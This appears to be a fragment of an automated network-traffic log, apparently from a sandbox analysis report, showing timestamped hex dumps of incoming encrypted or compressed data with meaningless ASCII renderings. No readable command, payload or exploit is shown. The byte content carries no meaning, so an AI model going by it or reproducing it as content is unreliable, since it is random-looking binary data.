                                                                                                                                                2022-09-29 12:51:25 UTC3602INData Raw: ec 57 4e d0 e6 ff 6f cf b9 65 dc d2 c5 8c c5 32 4f fc 37 13 a2 fa c5 40 e1 14 33 6f bb 4e 29 d7 30 79 4b bb c6 0b b4 b3 06 bc ad b2 62 70 7d 1a b8 b5 3c 9e 22 2a e6 51 f3 ce 08 ec 85 f1 36 bf 39 a5 ce ba b3 43 31 69 59 18 84 21 0d 0f 6a 68 62 27 33 9a b0 8d 79 a5 1e ab 1a b0 4d 25 39 2c 87 85 76 80 c8 08 47 39 69 96 6a 99 8c ee 47 d4 2a 76 e8 86 fb 65 d7 c4 37 96 a2 b5 5a 9d 72 4e 9c e8 df ff 7c 8f e8 d3 3d e4 70 86 5a 8b 56 b8 13 ea f4 d1 4a 30 dc 82 8f d3 2b 5f 7c af 87 e7 55 44 c7 4e 65 6c 7f b1 34 c3 ec 41 fc a0 a3 e3 71 90 74 0d d2 25 fe c4 ba de fd 4f b8 48 10 0f bb ac 8a 30 96 43 0e 14 3d 53 ec 91 48 ff ca 7b 6a 04 2c b3 d1 2c 8e db 7e c9 95 fa 20 f4 63 92 15 15 42 d2 7a 16 ee 25 ae 88 b2 8a 88 20 fa ce 97 37 d1 06 92 a7 6a 97 08 66 5a b9 82 c0 c4
                                                                                                                                                Data Ascii: WNoe2O7@3oN)0yKbp}<"*Q69C1iY!jhb'3yM%9,vG9ijG*ve7ZrN|=pZVJ0+_|UDNel4Aqt%OH0C=SH{j,,~ cBz% 7jfZ
                                                                                                                                                2022-09-29 12:51:25 UTC3618INData Raw: 46 fc 66 d2 9f 08 56 3c fa ee 87 42 c4 22 8c ff d9 06 d5 c7 96 5b 14 1b 02 65 e0 17 b3 46 97 ff 11 70 63 be 95 ed 48 21 90 d9 30 97 18 c8 f3 8d 1f fc 19 5a 4d 47 11 d6 ab e6 9a 33 3a e5 97 93 5b df 98 b3 d9 75 3d 2a 38 1c ac 0a 89 b7 c7 e9 70 d1 24 b0 88 17 29 fc e6 f1 4b 3d 6b 23 b3 2f b9 34 e6 bb 92 46 f7 aa f7 8e 86 0e 50 ef 1a 74 f3 46 64 c5 60 a5 a3 77 d3 d7 04 67 f8 5d 31 e8 71 4e dc 1a 36 e1 17 cd fb 9b af 07 db 99 4b 77 dc 50 86 67 62 33 26 e8 ce 1b 14 44 71 77 53 2c 98 a1 de 49 1d 1f f2 94 04 dd 6a e6 51 c0 b6 f1 0d 76 07 b3 f2 92 4e fd 77 d2 66 ce 12 f0 28 a7 ed e3 ac 90 7a 8f c7 dd c5 f0 40 bc 76 c0 82 d2 38 a5 66 92 f6 bf 73 55 33 43 d9 35 f7 06 16 40 d0 b7 f2 1a a5 18 8b 58 88 f6 8c c3 2a 22 14 2b 4b 32 d0 06 fb 95 46 95 de 41 8f f1 01 5e 7d
                                                                                                                                                Data Ascii: FfV<B"[eFpcH!0ZMG3:[u=*8p$)K=k#/4FPtFd`wg]1qN6KwPgb3&DqwS,IjQvNwf(z@v8fsU3C5@X*"+K2FA^}
                                                                                                                                                2022-09-29 12:51:25 UTC3634INData Raw: d2 2e 5f 19 0c dc e0 63 17 3d 1c 50 bc 7c 34 6e 6e 8b 76 28 89 6d 5c b1 c0 c3 f9 f5 84 9d ed eb 09 e3 74 4d 5a ad 26 9c cb 19 a7 16 dc 9b ac 60 3d 75 2f 9c bb 67 aa 6d 73 56 4b 57 82 38 c9 7b 3f 05 41 16 bc d2 6b 8b c4 5e 88 e2 ec 26 08 19 4b 07 3c c5 db 48 57 80 d8 b5 72 30 b1 c9 2d 18 c8 86 8d ef 01 58 4e 1e 8b 1d 14 e1 33 c2 8b 57 b8 54 2f 57 38 3d fb d9 55 e9 a1 62 fa 5e 17 b6 ef f1 26 b8 dc 0b 82 7f 94 f7 4f 74 ec b0 a8 14 f2 2d 4a 2d 37 fa 96 e6 f8 1a 40 23 ae 15 32 ed fa fa c8 b4 07 0d 3b 76 e5 10 2e bf 93 5c 9c d3 2e 50 fb 2f d6 a2 b3 36 83 c1 b6 06 cd 91 7d 36 b1 78 5b 9d b2 24 87 c5 fb b7 d0 a7 f8 6b 42 fb e8 21 41 b4 71 bf 53 76 a7 0e 50 4d c9 22 8c 5f 31 ed 3c 55 b4 3e 50 13 66 21 d8 c2 53 8d 0d b2 33 8c 1e f9 a3 28 e6 29 54 ac b7 29 9d 03 d7
                                                                                                                                                Data Ascii: ._c=P|4nnv(m\tMZ&`=u/gmsVKW8{?Ak^&K<HWr0-XN3WT/W8=Ub^&Ot-J-7@#2;v.\.P/6}6x[$kB!AqSvPM"_1<U>Pf!S3()T)
                                                                                                                                                2022-09-29 12:51:25 UTC3650INData Raw: 55 c8 ff af 44 50 4c 46 1a aa 4a ec 02 55 15 c6 03 66 bf 5e db 5c 00 e0 2e b8 05 39 94 15 5e 5d 18 69 0a a0 8d 32 5a 9e e9 8c c7 56 85 ad 4c 21 27 82 91 6b 08 c5 5f 83 0d ab b7 45 1e 9e 66 8e b1 ad ad fe 70 c4 0d a1 21 d6 11 4e aa 9c b5 28 14 4e 1a 1b 74 9b d3 0a 40 77 99 5d 73 47 1a 3c e0 25 11 7b 77 34 73 50 7e ef 22 96 ab 97 2b 40 d8 4c 6e e8 18 52 98 10 98 07 a0 3f 4f b9 db 55 b3 65 9b c9 5e ca a7 8c 80 e6 57 e0 19 54 a1 12 da 56 6a d5 54 dd af f0 36 8c 9d 98 f2 71 6d 7d fe 6e ac a0 9e 6e 56 57 c3 18 1f 32 a8 0d 9c 99 7d 49 73 14 e9 ef 15 9f f0 99 27 8d d2 4c 42 d9 cf 9f f5 91 f0 58 6f df 57 6c 82 a9 af c3 45 3c 95 d5 7a 7a ba 91 bb 60 44 e4 90 da c6 02 f7 7c e2 d5 cd 36 a4 27 6e 04 a2 8c ec f1 a7 3d 7d 77 f8 07 d6 62 50 df e4 4a d2 f8 00 b4 73 7a 36
                                                                                                                                                Data Ascii: UDPLFJUf^\.9^]i2ZVL!'k_Efp!N(Nt@w]sG<%{w4sP~"+@LnR?OUe^WTVjT6qm}nnVW2}Is'LBXoWlE<zz`D|6'n=}wbPJsz6
                                                                                                                                                2022-09-29 12:51:25 UTC3666INData Raw: 3d b0 34 88 0b 02 38 1b c1 f5 20 56 ef 42 1d 50 66 e1 30 f9 6a b9 3e f9 a2 ec 7b 23 cf 05 a7 82 e5 1b 24 b5 a3 80 ac b2 dd eb 50 61 74 f7 05 f4 78 23 9b 26 0d 9d bb 1c c1 7a c4 c7 f5 28 97 05 4e 00 9a 70 0f 6c d8 70 1a 8c 82 8c 57 2d 02 23 12 6e a0 ef e4 a2 0b f7 f3 26 0b 82 18 89 c7 16 f2 5c c1 9a 68 80 11 6b 2e 51 26 e4 15 84 cf 80 6f 88 f2 2d 53 c8 64 3a 9e 0a ba 73 ac eb 24 9f 32 3a 6b 92 5e 37 3c fb 28 ae 86 8e 8e 7c bb ff 1a 0a 58 c0 4d 55 62 48 d0 0d 89 85 eb 52 86 4f 8a f0 5e 14 91 86 a0 ec 15 63 20 d0 4f 8d 30 e6 3e 73 05 0e 75 56 1b f3 1f cc 29 ad 1a 80 92 93 e1 7d 69 49 34 44 3f 21 c4 66 8f 3f 42 3d 56 d6 e8 e9 35 39 35 cc 94 57 47 24 e4 ef 86 b3 7c 0b 11 6a 89 94 a6 16 ba f1 f4 a1 fb 10 ec 3e e5 16 68 a3 6e d4 42 66 c8 4c df 1e cd a6 60 91 86
                                                                                                                                                Data Ascii: =48 VBPf0j>{#$Patx#&z(NplpW-#n&\hk.Q&o-Sd:s$2:k^7<(|XMUbHRO^c O0>suV)}iI4D?!f?B=V595WG$|j>hnBfL`
                                                                                                                                                2022-09-29 12:51:25 UTC3682INData Raw: 5d c7 53 55 cf 9c b6 b1 54 c1 7b 1a 29 83 79 da 3f 7a 63 e2 b2 ee 80 82 bf ad fb 25 a0 be 5f 4d be f3 14 bc dc e2 94 7a 89 e8 36 4f 9c c4 d1 20 94 57 0c 1e a2 a3 87 f4 68 e8 84 8e bb 75 99 b3 07 99 31 cb 11 e1 ca 11 0b ba 2d 34 cd 2e d5 7c 21 8a a3 26 70 8c d7 17 0f cb 3d 5b a9 06 13 2f 51 2c f6 eb 07 6b 51 13 39 36 24 68 c7 07 77 75 78 3e 09 3b 9e 73 98 c4 2a 12 75 61 08 05 3c 66 9d d4 29 38 f5 03 a0 e1 2d 75 86 b7 8b ef 65 62 13 5c b6 f7 32 f7 d6 ad 39 99 d2 21 a8 6d 55 a0 f6 27 c1 fc b5 b0 e4 f6 9f 09 a1 8a f9 3b 04 af 0d df ed f8 6b a4 d8 28 f2 50 a0 f6 f5 43 32 84 a4 2c d4 86 06 76 7a 4b 9c e4 d0 4c cf b4 22 b7 92 b3 29 a4 06 67 0f ec fc 20 5d e7 36 9d 64 31 e8 fe df 94 40 1f cf 35 55 60 8e c9 4a 3e 75 a5 86 ba b8 50 b4 91 c5 28 f2 c6 e9 94 f4 a1 ab
                                                                                                                                                Data Ascii: ]SUT{)y?zc%_Mz6O Whu1-4.|!&p=[/Q,kQ96$hwux>;s*ua<f)8-ueb\29!mU';k(PC2,vzKL")g ]6d1@5U`J>uP(
                                                                                                                                                2022-09-29 12:51:25 UTC3698INData Raw: 94 92 ae b8 ad bf 2d 8d 15 cb 04 29 a8 ae fd f7 76 bf 03 b3 50 95 ae 3c d6 57 85 d8 59 96 d1 ba 63 47 29 f2 94 59 c3 f6 84 b5 2d 00 bf 36 c7 fa 30 84 83 d8 2c d5 0c 21 8d c2 7c 2e 1c 39 67 73 61 15 fb fa 61 64 e6 49 2a 60 4a 5d 67 54 7e a1 1a 61 68 ba 91 08 94 90 60 9e cf 87 f6 41 37 aa 83 de 26 6e e5 21 96 fe 78 73 16 ed 2b fb 76 ca 31 8d 5a 97 ef 3b 6f e6 41 a4 be 4b 56 86 70 2c 65 e0 3a 28 d6 2c f7 94 96 6c 3f f9 4f f2 0e 6a 85 2f aa 1b 9c c1 7b cf 10 7b 02 d5 2d b0 dc 2e dc 34 3d 44 e1 4f c3 ae 1b 13 53 b4 e8 82 3d 6a 0b ec 52 93 60 20 a3 d5 d3 f3 1d c8 fd d7 39 9c d5 a7 9d 92 d1 a6 77 21 5d f4 b9 b7 e9 2e 4c 76 40 c8 3f 63 c4 dc ea b3 7c 6b ab df b6 df 47 ad 56 6e 0c 83 2c 53 fd 90 22 55 6b f9 59 14 7f 41 6e 03 56 92 32 81 fe 40 98 18 f6 62 83 e6 83
                                                                                                                                                Data Ascii: -)vP<WYcG)Y-60,!|.9gsaadI*`J]gT~ah`A7&n!xs+v1Z;oAKVp,e:(,l?Oj/{{-.4=DOS=jR` 9w!].Lv@?c|kGVn,S"UkYAnV2@b
                                                                                                                                                2022-09-29 12:51:25 UTC3714INData Raw: ee 07 76 a1 3a ac 3a e9 45 01 c4 52 47 2b 3c 62 66 b8 5a a0 26 9c f1 6d 57 dd 9c 50 53 6c a5 7b 1c 60 25 1d 6a ea 67 92 90 b2 7f f5 66 e8 4e 17 cb b8 2d 26 7e 2f b0 ba df 96 11 6f c7 cf 95 dd f7 f8 e4 f7 5d 0f 4c 95 b9 3b 4d 1d 57 fb 70 a3 e8 d0 1e 75 b6 dd 1a b5 02 15 47 48 ba bf 70 59 2f 39 c3 e1 6b 55 14 a4 e8 54 4a 8f 53 8e 97 e4 37 94 95 65 4a 4f 6c 50 1e 0e 03 09 ff a5 cb d5 13 49 b1 16 10 e4 f8 2a 8d 97 cb 9b 2e 7b cd aa c8 97 69 85 2b 51 74 ac f4 0c e8 92 1e 1d 91 a7 80 32 a7 b9 b1 70 15 0e 91 e4 1e e4 4b 21 b2 55 78 45 9c 3e 1c 19 91 0b 2f 81 07 3d fa c6 b6 b2 69 f8 17 61 81 f6 30 79 82 fe a6 03 2d f0 35 7e c4 41 17 d8 7d 90 09 bd 52 1a fa f7 b5 4e eb f4 50 ca a3 70 c7 5e e1 a3 8e 25 6a b9 2a a4 27 b7 d9 e8 df fb 93 f8 c9 b1 c4 b0 31 de 56 a6 15
                                                                                                                                                Data Ascii: v::ERG+<bfZ&mWPSl{`%jgfN-&~/o]L;MWpuGHpY/9kUTJS7eJOlPI*.{i+Qt2pK!UxE>/=ia0y-5~A}RNPp^%j*'1V
                                                                                                                                                2022-09-29 12:51:25 UTC3730INData Raw: 59 44 b3 7d d5 de e1 ac 22 d1 a7 bb 69 5e 08 09 c3 c8 37 5d 71 9b f7 aa 61 c2 39 fd 57 20 5b 6b 03 e8 53 1e d1 4b 8f 01 b6 0c 3a 00 46 61 72 fc cd e8 2f 13 72 f2 33 93 74 86 cc de 53 52 b9 f1 06 45 c1 31 f5 ea f2 95 b6 6b 57 71 f5 bb d6 58 9c 30 11 96 1a 7c cf e6 b2 0b ba 5d 48 8f b9 01 9f e2 b4 b2 2c d7 cb 03 14 bf bd 79 d7 04 c7 7c 13 0d 50 ee dd af 0a 89 e3 2c 42 c8 bb 31 86 ae 69 2f fa 22 0c 31 da 3e 88 6b 72 ba 03 64 f5 13 76 d7 fe 84 ec 98 92 e7 63 72 74 37 c0 60 99 38 76 75 bf d7 92 c3 83 88 87 05 43 ed a1 da 7a c6 10 56 5f 6f 25 64 92 58 b0 71 93 32 e1 a3 6c 08 ba 77 f3 a0 8f 19 fe 2b 12 03 a9 03 04 9f 1f 22 62 0d 21 36 a9 e4 1a 66 10 84 a8 d3 47 b7 ac c8 68 1f a9 eb 14 ac dd d1 fa 02 50 c1 4e ee f1 f2 15 bb a0 0a 14 b1 6a a5 cb cd 04 9f 41 cd b2
                                                                                                                                                Data Ascii: YD}"i^7]qa9W [kSK:Far/r3tSRE1kWqX0|]H,y|P,B1i/"1>krdvcrt7`8vuCzV_o%dXq2lw+"b!6fGhPNjA
                                                                                                                                                2022-09-29 12:51:25 UTC3746INData Raw: f9 bc 1b eb a7 bc cb ce 19 f8 2e 0e 16 2e 3f 99 24 84 82 5f 07 a8 4b bb 93 c9 6c 4a 03 e8 6b a3 a1 7f 86 ef 6f 61 12 65 34 21 e5 8f fb 64 ea 8a 16 83 40 78 a4 bb 30 27 d2 25 52 e3 f8 89 6d bd 29 f4 26 b1 2f fb 47 cc 49 f8 d0 da 7c aa 13 5f 56 66 ce b3 f6 dc 66 40 f1 8d 5d 29 5a 63 ed 68 30 a5 c1 e7 aa c1 35 9a 95 4a 16 18 a9 67 4e b0 1f ae f9 71 fd 8b f6 af 5d 8a 4f 21 f3 fb 7f c4 fb d1 71 93 8f 02 93 59 0d 83 93 a2 9d 10 a2 6f 35 17 94 85 ec 8d af 90 36 70 b9 de df a0 3f 5c c9 56 74 8f 2b 12 a2 a5 d6 5c df 7e 9e ca 62 a4 8c ab d4 78 28 e9 58 75 aa 87 61 c4 ee 3f dc 92 be 43 06 51 37 60 cf ff 88 3a 50 60 2e 9a ff 38 33 7d 1a ed f2 fe e5 d1 fa 08 ec b1 71 5f 95 0c ce 5a bb 68 fc 66 da 45 88 bd 00 51 5d 6b ff 52 a7 88 7f a1 69 3d 4c 00 f4 43 0a 6b d5 71 0d
                                                                                                                                                Data Ascii: ..?$_KlJkoae4!d@x0'%Rm)&/GI|_Vff@])Zch05JgNq]O!qYo56p?\Vt+\~bx(Xua?CQ7`:P`.83}q_ZhfEQ]kRi=LCkq
                                                                                                                                                2022-09-29 12:51:25 UTC3762INData Raw: 37 74 d0 88 00 38 e4 f1 41 88 6f f9 c4 c7 e7 4b cf 1f 5a 6b 2b 04 e9 74 46 84 6a 76 00 9b fd d2 4e 2f 10 1a 6e 21 45 4e 28 09 4d b8 b2 8b 3b 3f d7 1e a6 fd e3 15 34 4b 78 ed e0 9e 63 67 f8 29 9b cf ad 14 e6 27 ad f1 56 8a be b2 b4 34 97 cf 95 8c ab 46 8e fb a8 8a 24 bb f4 83 28 bf 05 8a d8 04 97 08 85 df a0 6a a0 00 a5 14 29 cc 83 ab 7e 82 fc 86 72 7c 4b 3e 1b a2 17 8b 49 f4 d5 64 73 8e 0b 84 4e 6a 3b 90 5a 45 63 7b b4 b1 7d 59 48 70 d2 e5 7d c5 17 f3 26 0d 22 c1 7c 76 9a 93 02 55 9f f6 83 9c e3 7a 60 ae 95 8e b1 a1 de 69 a9 66 2f 54 a2 f5 44 25 68 b9 e6 7d c1 33 98 b6 9f 80 d0 f0 26 66 86 aa ca 73 e3 75 71 9c 2c 69 57 3f 3c b3 02 68 dc 5b 66 6a d8 bb d0 25 48 9b 26 5a 37 1a 2c 59 e5 cf 6c 6d 89 89 2d 68 f2 3b 73 4e ca 77 21 88 32 36 71 34 fb 65 c3 fa 3c
                                                                                                                                                Data Ascii: 7t8AoKZk+tFjvN/n!EN(M;?4Kxcg)'V4F$(j)~r|K>IdsNj;ZEc{}YHp}&"|vUz`if/TD%h}3&fsuq,iW?<h[fj%H&Z7,Ylm-h;sNw!26q4e<
                                                                                                                                                2022-09-29 12:51:25 UTC3778INData Raw: 5a 64 47 31 8b a3 41 35 6a 16 2f 8f 20 b3 fe 38 4b ac de e9 47 00 23 e7 18 0d 47 a0 4b da 38 97 a0 9b 75 14 b6 3b d6 9c 81 1b 78 7d 20 1f 9e c6 66 ae f3 b2 30 b4 ae 32 47 f0 03 19 65 f0 d8 e9 9a 04 c7 f9 c0 b5 04 1d bf 81 bb bf 5d 83 72 53 64 cc a1 71 79 c2 08 03 48 bc 31 a2 16 7c 17 4b 72 99 24 4c 7c ca f6 ad aa a8 ec eb 29 29 bf 90 b6 3c 5a c0 b9 97 23 9c e8 e1 cc 74 fc bf 88 c8 83 69 3c 31 2d a7 fe 79 be af 1a 6a 9c 64 a5 56 e2 f8 22 71 85 61 5c 99 25 24 70 d0 5e 5e 87 9a 8a df 9e b9 3e 6e 65 56 e0 ae 33 58 58 71 7b 4f 8d f9 c1 cc eb 5d 3e 18 a9 d4 15 72 a6 d6 9d 36 16 d1 e3 a0 bd 20 99 0f 51 b7 26 a7 e2 bf 2e 58 7c a1 8c 08 6e e4 2e 7c c1 02 ef 3b 27 07 43 c2 6f 23 74 93 38 74 34 b9 61 b4 97 02 1c c6 4a 37 95 47 86 86 cd c9 ba 1c d1 07 76 24 e2 a0 30
                                                                                                                                                Data Ascii: ZdG1A5j/ 8KG#GK8u;x} f02Ge]rSdqyH1|Kr$L|))<Z#ti<1-yjdV"qa\%$p^^>neV3XXq{O]>r6 Q&.X|n.|;'Co#t8t4aJ7Gv$0
                                                                                                                                                2022-09-29 12:51:25 UTC3794INData Raw: a4 6d ca f0 cf bb 34 9a 7b de 92 4e 6f 3a 8f b8 53 c3 85 8f b7 23 eb 2c aa 1e bd 1e 37 70 c6 4d 59 68 d1 46 e2 d6 30 ee c7 d7 f1 8e ee 7e ef 2c df 7a 47 35 99 ee 79 38 f7 53 b3 26 13 81 61 1d 9f 9a e7 73 ac 7e e1 d7 55 fe 35 d1 e1 6a c9 fa ae b5 9e 29 d5 91 66 00 b6 70 d8 55 51 82 fa f6 1a af f7 00 e7 4c 5e 4e c9 4b 67 4a 55 a2 f5 a3 c3 01 d9 63 54 d1 19 db 1c 9d 9e 0d a4 57 3a 43 81 3a 5a fe 8c d8 71 a4 80 4a 0e 1d af 24 a6 6f 85 72 ab 83 22 cf 56 f2 76 a6 7f 47 86 1d 9c d8 c9 01 ef bf 41 e2 22 39 0e 83 78 5f e9 ab 9f 5a 96 bd c8 60 7d e5 93 a6 f4 6a 8a 04 b4 ad 8d b5 42 c5 0c c1 00 b0 85 d2 cc 56 91 a3 ca 7f 6c c3 6e e0 91 8e 29 09 e0 f8 02 b7 cc e6 a0 8a 6d 3e 90 11 67 33 e1 f9 e1 9c 19 6d 88 59 81 67 0a 6a 84 b8 10 59 60 1f 73 fc 05 70 ad 4c 4f 1a e8
                                                                                                                                                Data Ascii: m4{No:S#,7pMYhF0~,zG5y8S&as~U5j)fpUQL^NKgJUcTW:C:ZqJ$or"VvGA"9x_Z`}jBVln)m>g3mYgjY`spLO
                                                                                                                                                2022-09-29 12:51:25 UTC3810INData Raw: 56 73 76 b1 56 ad 0c a8 75 80 e2 29 7f 5b 11 23 ea ca 3f 73 db be a6 31 ee b1 9f 98 40 33 a4 5b c9 d8 03 8a ad ce 30 e7 38 ac f8 6a 86 75 7c 4e 71 00 f8 7c eb 72 45 ea 58 22 90 3b 77 dc c9 3d 97 9b 56 04 9d 27 b7 17 40 e3 83 02 64 71 dd 6d 56 5d 5c d2 8e c9 fe 05 3b 74 0e cf 15 63 46 f7 0f 23 ec ff b9 38 24 4e af 87 db 8d 94 24 65 0d 00 dd de a7 10 05 56 c3 99 9d 33 e7 a2 c1 eb 33 98 39 81 4f fb 6b 50 f7 c8 00 1c c8 97 57 0a 3a 88 92 4b b2 6b 1d 12 f5 bf eb 6e 0d 7c f5 fa fd c8 b0 2c 91 2b b4 7f 50 28 f5 c7 45 b7 79 7e 71 25 32 ce 7c 0f 51 2d ad 88 55 de 47 82 a2 a5 c8 b7 2c b6 79 a7 d2 17 2c bd 67 11 23 d7 9e 45 cc 0a 07 61 23 12 08 60 3c 0e 90 a0 19 64 df ab a5 bd f1 37 2e fe 65 9b c1 c5 e7 c8 3f 76 3a e5 1d 17 7e 6e b6 55 e7 24 d7 cc f0 56 e0 ab bb 40
                                                                                                                                                Data Ascii: VsvVu)[#?s1@3[08ju|Nq|rEX";w=V'@dqmV]\;tcF#8$N$eV339OkPW:Kkn|,+P(Ey~q%2|Q-UG,y,g#Ea#`<d7.e?v:~nU$V@
                                                                                                                                                2022-09-29 12:51:25 UTC3826INData Raw: f2 08 90 c1 25 3d ae 06 15 59 99 1f c8 91 16 95 9e df 0b c1 21 1b ba 05 fd b8 79 b6 2f c6 e4 fb 1d 65 de 93 6a b6 3e 35 2c 68 89 e9 5b 88 00 8a ea df 9e 27 36 ae 95 a4 d6 26 da 2b fe a0 6e 3e 13 cd 02 ab 55 f3 82 dd 7e 15 04 c3 f7 79 67 1b 9e 84 cd 2d 66 13 90 45 df 4a f4 e8 46 39 6e 21 59 fb 07 16 e5 b9 ed 76 5f 96 2d 22 e9 f3 e4 6f 8e c6 3c 10 4e 2e b8 08 46 55 66 bf d5 74 cb c8 17 9e e9 93 ef 3c 16 bf 85 b1 d1 ba bd 5e 78 e8 93 2f 58 d5 aa 67 0b 34 65 11 44 4b 8d 1d 73 ff 11 55 0b 38 b6 55 f8 dc ed be 1e ad 01 8d bf 96 b2 24 6c 49 ae a3 0b fb 1d 15 4e cf db 0c ce 44 95 3e 40 85 19 60 2d 7b 78 7c db 0e f8 3f 67 7f 93 8c 8a 69 b7 b6 6a b5 c1 72 d2 5a 7b 29 36 2f f1 fc ce 5e 8a 6f 86 69 c6 71 46 c8 ed fd 04 c1 3b 38 ba 7b cd 31 6d 21 f2 08 d4 2b 6f 9a 1b
                                                                                                                                                Data Ascii: %=Y!y/ej>5,h['6&+n>U~yg-fEJF9n!Yv_-"o<N.FUft<^x/Xg4eDKsU8U$lIND>@`-{x|?gijrZ{)6/^oiqF;8{1m!+o
                                                                                                                                                2022-09-29 12:51:25 UTC3842INData Raw: a1 2a 79 9e 38 75 3c 83 04 b0 09 12 15 e7 ee 8f 1b ba a6 2d c1 a3 68 89 42 ef 1e 33 fa 2d 03 0a 74 c2 e8 c9 c1 d7 97 57 86 9f cc e7 97 10 02 22 88 8d 7d dc 95 e1 6d 9e 81 7e 45 72 9c 1b 93 eb c6 3a 6b 28 8f 01 59 fa 2f b1 fc 3c 86 55 fe 78 7c 31 d3 67 0b 32 70 32 ed ea 58 53 15 2f 1c 1a e6 95 ff a3 68 ba ba fe 35 99 1c ca 12 16 9c 4b 21 38 cb 99 7e b6 ab fa 91 52 95 f8 b0 98 a9 60 1b 6d d8 c4 07 15 51 2c ff 30 5b 58 d1 2e 49 fd f5 2c 42 8e ae 24 14 95 ce de b9 d4 22 09 4d f0 80 fd 6d 05 b5 69 67 9b 1c 0e a3 57 83 f3 d2 5a f2 75 6a bd 1e a7 5b ac a5 c1 37 81 c0 7d 77 04 c3 72 de ec c7 42 c4 bd aa 4b 44 08 c1 3b 1f 34 de 02 f1 20 9c a5 d6 74 99 60 0e 73 70 04 98 53 fc 03 c3 79 0c 73 ca 39 05 ca 95 ac 2b e1 f9 4b b5 33 75 6c 8f ab 15 0c b0 4f 54 a6 b2 6e 8a
                                                                                                                                                Data Ascii: *y8u<-hB3-tW"}m~Er:k(Y/<Ux|1g2p2XS/h5K!8~R`mQ,0[X.I,B$"MmigWZuj[7}wrBKD;4 t`spSys9+K3ulOTn
                                                                                                                                                2022-09-29 12:51:25 UTC3858INData Raw: bf ba ce 29 0d d4 f9 bb ee 1c 8e e6 3b 00 f2 9d d3 21 79 5a 93 6a dc 2c 5e 03 01 25 f6 43 20 35 a7 cf 0a d6 8c a4 b1 e8 e4 b9 ae bd a9 8e 34 c1 e4 97 fb 1d 34 25 a7 e8 c2 35 93 d8 98 b0 44 fe 32 93 7b d0 fa 95 f8 81 1f 5a 76 5f 92 4a 09 f7 cf 6c 62 ed ce 73 d1 81 de 9e 50 0c aa 10 d8 a6 05 5a ea 0c 37 9d 22 4c 07 d4 bd da ff 66 4f 97 08 b7 5b a2 97 2f f1 4c fe 04 6b 71 69 bc 14 be 28 aa bd 6b c2 41 17 16 be f1 fb 68 04 90 fd 2f 30 7d ae 4a 34 f7 cd 58 ba 2a ee fa fd 2d 48 4c 47 a6 5e 91 dd d2 5c a1 66 65 8a ee 1f d2 47 9c 46 36 3d d4 29 d3 0a 52 13 b2 dc 71 96 ca 5c fd 1f db d7 9f 10 d5 10 31 93 68 8b 58 be c3 78 a9 18 e3 f4 75 56 dd 28 dc fa 0c a0 81 22 30 9f 25 82 94 45 c6 d0 98 bd 86 88 68 d9 a8 7f c3 c9 f7 11 8c f6 7f 24 69 90 58 55 d5 98 68 12 05 22
                                                                                                                                                Data Ascii: );!yZj,^%C 544%5D2{Zv_JlbsPZ7"LfO[/Lkqi(kAh/0}J4X*-HLG^\feGF6=)Rq\1hXxuV("0%Eh$iXUh"
                                                                                                                                                2022-09-29 12:51:25 UTC3874INData Raw: 69 c3 c5 29 52 17 0c 48 6f 59 58 2e e0 62 f6 81 4b 10 b7 51 bf cf 3b f5 70 28 b8 36 3a d9 b1 60 74 e0 40 4e 52 d6 46 3b c5 b0 af 7e 52 3d 87 9b 42 98 a8 31 f4 91 ea 64 df 80 10 23 6b 2d a0 30 4e 65 d2 54 c0 63 45 7b 84 aa 4e c1 97 40 6c 95 2b 10 9c 45 59 5a d1 05 96 7b b7 cb 88 fb e7 db 57 26 23 0b a7 a5 70 d1 05 49 4f 6d 97 dd aa 3e fe 9b 8a 1f 41 cc 41 59 61 24 49 ff 7e 7c 91 9b 45 db e2 64 08 f4 48 0d 79 27 9d b9 b3 e2 a7 ce 8f 0e aa 8f 36 66 c6 72 bf fc 28 45 27 46 1d df f9 c5 96 62 7d 9e ec 7a 52 1d ec 2c 05 11 ad cc de 0a 72 13 bf 87 76 cf 7f 08 f2 41 3b a1 06 a1 ae 58 53 c4 13 de 77 f2 78 85 43 df bb 49 5d 94 d9 ed 8d 6e 92 a1 4f ca 4b 1e c1 59 7d d7 3e a5 36 3a 3f 30 1e 2e 3a c6 fd 7c 87 a1 9f b1 74 e5 18 27 71 f0 8f 64 43 93 2b 97 84 73 8c 38 be
                                                                                                                                                Data Ascii: i)RHoYX.bKQ;p(6:`t@NRF;~R=B1d#k-0NeTcE{N@l+EYZ{W&#pIOm>AAYa$I~|EdHy'6fr(E'Fb}zR,rvA;XSwxCI]nOKY}>6:?0.:|t'qdC+s8
                                                                                                                                                2022-09-29 12:51:25 UTC3890INData Raw: 0b 20 ae 92 3f 43 ec d5 54 53 ae d7 9e 87 00 0c 45 f7 1e 08 35 a6 ee ed 01 e8 92 7d cc 4e 3e d6 4f 12 71 21 22 2c 3b 72 72 fb 39 fe c6 e0 2b 3e f1 0b a2 aa 8d 00 f5 2a c8 8b b7 3f b3 31 6e 69 04 14 ca db 3f 0b 33 09 6a 49 5a f0 7b 25 8b 29 f9 37 e6 98 5d f5 05 9f e1 ec ab 1f ce 8f 01 3f 28 87 e3 dc a2 31 0c 33 80 18 04 68 55 93 4c b9 cf 5d 65 0d 11 dd 52 d7 e4 ce 48 3a 9f 4c 64 b0 af 0f 6b ff d1 78 49 6d 6a 0c f3 1c bc 77 32 7d d8 61 5e 11 35 55 a5 dd eb 9e 7b a4 69 68 38 21 70 b4 86 ac 22 bc 92 f2 0d 3b 3e 9f 40 a2 f5 7b 62 92 51 d7 dd d0 9c d8 09 63 0f 79 3c 52 d7 ea fa f6 a4 f9 1c 0b 08 93 6b 3d 15 d2 08 86 85 ee 79 92 4b 14 c7 d5 17 68 85 18 5d 3c 2e 19 8d 95 a0 dd 8b ac 1c 39 69 dc a5 98 7e b6 2e 6e 3f 5c 0a 34 ac 9b 50 7e 3e 50 58 2c ce 3d a1 5a 66
                                                                                                                                                Data Ascii: ?CTSE5}N>Oq!",;rr9+>*?1ni?3jIZ{%)7]?(13hUL]eRH:LdkxImjw2}a^5U{ih8!p";>@{bQcy<Rk=yKh]<.9i~.n?\4P~>PX,=Zf
